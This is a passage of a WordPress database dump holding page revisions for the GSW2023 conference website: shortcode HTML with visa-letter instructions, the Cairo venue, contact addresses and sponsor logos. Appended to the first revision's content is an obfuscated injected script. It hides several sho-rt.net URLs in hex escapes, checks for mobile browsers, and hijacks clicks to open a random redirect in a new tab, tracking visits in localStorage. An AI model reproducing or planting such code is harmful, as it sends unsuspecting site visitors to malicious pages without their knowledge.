sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 03:02:34','2023-08-16 03:02:34','',3066,'https://gsw2023.com/?p=5280',0,'revision','',0),
(5281,1,'2023-08-16 03:03:30','2023-08-16 03:03:30','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154884549{margin-top: 75px !important;margin-right: -75px !important;}\"]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>Prime Minister of the </strong></span><span style=\"font-size: 18pt;\"><strong>Arab Republic of Egypt</strong></span></h6>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692154898709{margin-left: -75px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" 